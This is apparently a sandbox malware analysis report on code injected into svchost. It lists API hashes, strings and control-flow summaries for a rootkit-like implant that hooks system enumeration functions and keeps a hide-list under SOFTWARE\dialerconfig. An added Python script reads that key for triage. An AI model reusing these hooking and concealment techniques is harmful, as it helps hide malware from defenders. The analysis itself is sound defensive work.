                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction ID: bdc4653b437380b3f3f4ca15b24486875ab127c3d64caf90ce25882780f20bf3
                                                        • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction Fuzzy Hash: 0901807260AAD6D6E704DF62E8851AA67A2F749FC1F484834DA8A43725DF38C051C740
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 40f7c5f63300661cd661e55aa19decf58a802a22f31068c6dfd4796ed8c75239
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: D291E4B270A65285F7609F65D4C23FDABA2B705B88F1C4529DE8B577A4DB7DC842C300
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: defa4ae0642d6a32399fd8954af5e6e6148f63eaf2e33393bd27ecb724b6d61b
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: 31115A72715F428AEB00CF61E8953B933A4F319759F480E31DA6E867A4DB7CC1988380
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: bb72addb5a8917fd1520e25578be5bde8718d817993148d3e88a25d5e77b9b06
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: 7571A4B620978685EB25DF29D8C43FAA7A6F385784F4C0036DD8B53BA9DB3DC6458700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 3341bbce40f2fc636230826d8423e9b0d65deab6b2a0a9c3cd1c9539a72497e8
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 7761927360AB468AEB10DF65D4907ED77A2F344B88F084225EF4A17BA8DB38D595CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 1e2d7e75fcec33aae6cfda06d1fedda4746025f1c3ce262bf2523ed21a116398
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 305184B220E78B82EA64DA29E4D83FAE792F395740F4D0135DD9B03B6ADB3DC5058740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: ecc2ab4eee834b5eb349c99eeea2a38c23bc3884ca80047f2a69e4f6d83fdaf1
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: FB41A8B271AA8185EB20DF25E4853F9B7A1F798794F584431EE8E877A4DB7CC441C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: 0434695ab50d31999ccfb44931bc123f96a23a80cf5f0d546cb8bc6dfc13b013
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: E6112B76219B8582EB618B15E4803A9B7E6FB88B94F5C4225EE8D07B69DF3CC551CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: c69f2d03e7c10632b7f5d63e6c16b7762b360b625939375ae85a8f999810678c
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: 2EE086B1749B4590DF028F21E8902E833A1DBA8B64F8C9232995D0A321FB3CD5E9C301
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: f00d30d7b76d42afc42083ec7512426173d9921f52db44da75f216fa2e63f94c
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: 2EE086B1709B4590DF028F21E8901E87361E7A8B54F8C9232C94D0A321EB3CD5E5C300
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 6aa450c30a7baaebf75d86072b728c595605062254c08432bf4957f3f5be0a0b
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: B6116375606B8A81FA04DB56D4852BA67A2F789FC0F5C4035DE4E43775DF3CC4418340
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 5be64a25ae3680dda377404a020bb3eed52e059bff3fe1fe1c5071d9c80fb988
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 18E0657560264586F7048F92D84939B3BE2FB89F45F48C424C94A07361DF7D8495C750

                                                        Execution Graph

                                                        Execution Coverage: 0.7%
                                                        Dynamic/Decrypted Code Coverage: 0%
                                                        Signature Coverage: 0%
                                                        Total number of Nodes: 66
                                                        Total number of Limit Nodes: 2
                                                        execution_graph

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 3351c60c845fd7169fdfdb9f14dc5b268d6217c379f2eec7515d69f6ca4aac72
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 82E039356417048AFB068BE2D8497AA36E1EB9AB1AF049028890A47351DF7EC499C791

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: 0989cddc6aaa1a1faba2074b06e92315ed3e7b45a9aad1d7a4383a5ef0838ee0
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 71115A366DC700A6F76097E0AAC7FF92296A748B1FF404128990FC1592FF7BC044C280

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000001CBD8BD1628: GetProcessHeap.KERNEL32 ref: 000001CBD8BD1633
                                                          • Part of subcall function 000001CBD8BD1628: HeapAlloc.KERNEL32 ref: 000001CBD8BD1642
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD16B2
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD16DF
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD16F9
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD1719
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD1734
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD1754
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD176F
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD178F
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD17AA
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD17CA
                                                        • Sleep.KERNEL32 ref: 000001CBD8BD1AD7
                                                        • SleepEx.KERNELBASE ref: 000001CBD8BD1ADD
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD17E5
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD1805
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD1820
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD1840
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD185B
                                                          • Part of subcall function 000001CBD8BD1628: RegOpenKeyExW.ADVAPI32 ref: 000001CBD8BD187B
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD1896
                                                          • Part of subcall function 000001CBD8BD1628: RegCloseKey.ADVAPI32 ref: 000001CBD8BD18A0
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: b0c894f7784fe93fd5e4d912c2eb019049ba366880ae2a28af5649d789d49e3d
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 94312571389B0161FB509BE2D6D37F9939AA744BCAF0464218E0FC7296FF17C451C290

                                                        Control-flow Graph

                                                        control_flow_graph (collapsed): 1cbd8bd3844 is a three-block helper; one branch calls StrCmpNIW (1cbd8bd3851-1cbd8bd3864) and both paths join at 1cbd8bd3869; the only string it references is "dialer" (see String ID below)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: dialer
                                                        • API String ID: 0-3528709123
                                                        • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction ID: 6c3c39336d40b37e6c8cf9515fa28cbcf7c24992cf0487896dc8f09ec8df4234
                                                        • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction Fuzzy Hash: 7CD05E703953059AFB159FEA88C6EF02351AB08B9AF888024890A81251EB5BC99DD750

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 18b38bb5507917fa2352624df611951c3bb57cdfa5d1b2d23385e643455212a1
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: E4614732B8539087EB14CF948081BBD739AFB54B99F548131DE0E53785DB7AD852C784

                                                        Control-flow Graph

                                                        control_flow_graph (collapsed): 1cbd8bd2b2c opens with call 1cbd8bf2ce0 and a chain of early-exit checks to the common return at 1cbd8bd2ee0; on the main path it calls GetModuleHandleA (1cbd8bd2bc9) and GetProcAddress (1cbd8bd2bdb), runs StrCmpNIW (1cbd8bd2c14), then walks a loop (1cbd8bd2c60 ... 1cbd8bd2ed2) that calls 1cbd8bd199c, 1cbd8bd1bbc, lstrlenW, 1cbd8bd3844 and 1cbd8bd152c on each entry, and finishes with up to three calls to 1cbd8bd85c0 (1cbd8bd2e63, 1cbd8bd2e85, 1cbd8bd2eab); the strings it uses are ntdll.dll, NtQueryObject and \Device\Nsi (String ID below)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 79a09f8f3720bc5273b010d1f356e68a70ec6752ccfd98b3c301455b28cdac55
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 4BB16B32258B9096FB698FE5D482BF963AAF744B8AF045016DE0F93794DB37D841C380
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 03cf5bd3c19122581734986f2c10f6d311e666521bfd68b1f6af84beb660f4f4
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: F6319E72248B809AFB608FE0E881BED7365F785709F44402ADA4F87B94EF3AC549C740
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: a64a8fafea4748a103742ffd9067c0c0469601ae63dc2b93c66a8a842f97a94b
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: 67319332258F809AEB60CFA5E8817EE73A1F789759F540115EA9E83B54DF3AC145CB40

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 19dde69792006792dc4b80681f5feac67894e51617c30498e9630f35d049b7da
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: 7A713936758B1099FB119FE5E8D2AA96365F784B8EF006111DA4F87B29DF37C544C380
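The API sequence and strings above (RegOpenKeyExW on SOFTWARE\dialerconfig, one RegOpenKeyExW per subkey, RegQueryInfoKeyW and RegEnumValueW walking each subkey's values into heap buffers) are the implant reading its hide-list from the registry, and the execution graph earlier in this section shows the same reader being called again after Sleep/SleepEx, so the list can be updated at run time. The triage script below is an added example, not code from the report or from the sample: it assumes the eight subkey names in the String ID, assumes the key lives under HKLM or HKCU (the hive is not visible in the report), and treats every value found under those subkeys as an indicator to review. The in-memory sample tree is constructed so the logic also runs off Windows.

```python
"""Added example (not from the report or the sample): read the hide-list a
'dialerconfig'-style implant keeps under SOFTWARE\\dialerconfig.
Subkey names come from the report's strings; the hive is an assumption."""
import sys
from typing import Dict, List, Optional, Tuple

CONFIG_PATH = r"SOFTWARE\dialerconfig"
# The eight subkeys the implant opens one after another (report strings).
SUBKEYS = ("paths", "pid", "process_names", "service_names",
           "startup", "tcp_local", "tcp_remote", "udp")

Row = Tuple[str, Optional[str], object]   # (subkey, value name, data)

# Constructed stand-in for the registry so the logic runs anywhere.
SAMPLE_TREE: Dict[str, List[Tuple[str, object]]] = {
    "process_names": [("0", "updater.exe"), ("1", "hidden.exe")],
    "tcp_remote":    [("0", "3333"), ("1", "14444")],
    "pid":           [("0", 4212)],
    "paths":         [],            # present but empty
    # service_names, startup, tcp_local, udp: absent in this sample
}

def collect_from_tree(tree: Dict[str, List[Tuple[str, object]]]) -> List[Row]:
    """Flatten {subkey: [(name, data), ...]} into rows. Absent subkeys give
    (sub, None, None) and empty ones (sub, "", None), so a partial or empty
    hide-list is still visible in the output."""
    rows: List[Row] = []
    for sub in SUBKEYS:
        values = tree.get(sub)
        if values is None:
            rows.append((sub, None, None))
        elif not values:
            rows.append((sub, "", None))
        else:
            rows.extend((sub, name, data) for name, data in values)
    return rows

def summarize(rows: List[Row]) -> Dict[str, int]:
    """Number of real entries per subkey; anything non-zero is worth triage."""
    counts = {sub: 0 for sub in SUBKEYS}
    for sub, _name, data in rows:
        if data is not None:             # placeholder rows carry data=None
            counts[sub] += 1
    return counts

def read_live_tree(hive_name: str) -> Dict[str, List[Tuple[str, object]]]:
    """Windows only: walk the real key with winreg (RegOpenKeyExW /
    RegEnumValueW, the same calls the implant uses). {} if the key is absent.
    Run this from a process the implant has not injected into: its
    NtEnumerateKey / NtEnumerateValueKey hooks could filter what we see."""
    import winreg
    hive = {"HKLM": winreg.HKEY_LOCAL_MACHINE,
            "HKCU": winreg.HKEY_CURRENT_USER}[hive_name]
    tree: Dict[str, List[Tuple[str, object]]] = {}
    try:
        root = winreg.OpenKey(hive, CONFIG_PATH, 0, winreg.KEY_READ)
    except OSError:
        return tree
    with root:
        for sub in SUBKEYS:
            try:
                key = winreg.OpenKey(root, sub, 0, winreg.KEY_READ)
            except OSError:
                continue
            with key:
                values: List[Tuple[str, object]] = []
                index = 0
                while True:
                    try:
                        name, data, _kind = winreg.EnumValue(key, index)
                    except OSError:       # ERROR_NO_MORE_ITEMS
                        break
                    values.append((name, data))
                    index += 1
                tree[sub] = values
    return tree

if __name__ == "__main__":
    trees = ({h: read_live_tree(h) for h in ("HKLM", "HKCU")}
             if sys.platform == "win32" else {"sample": SAMPLE_TREE})
    for label, tree in trees.items():
        if not tree:
            print(label, CONFIG_PATH, "not present")
            continue
        for row in collect_from_tree(tree):
            print(label, *row)
        print(label, "entries per subkey:", summarize(collect_from_tree(tree)))
```

Because the implant re-reads this key in a loop, deleting the values is a quick way to make hidden processes, services and connections visible again for collection, but it does not remove the hooks themselves; the key's ACL and timestamps are also worth capturing before any change.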

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 4748ce0690830c0898785a435476f9b8f0d028ed3fb3b1bc3ab9656b80b8c298
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 96516E32248B84CAF755CFE2E4857AAB7A1F789B9AF044124DA4E47719DF3EC045CB40

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: e634467b1f32646224c8287f2fc796e93386f02fba06a326c16b56ff7ceecbf6
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: A6318474589B8AA4FA05DBE9E8D3EF46326A70434EF845013941F86166AFBBC24DC3D0

                                                        Control-flow Graph

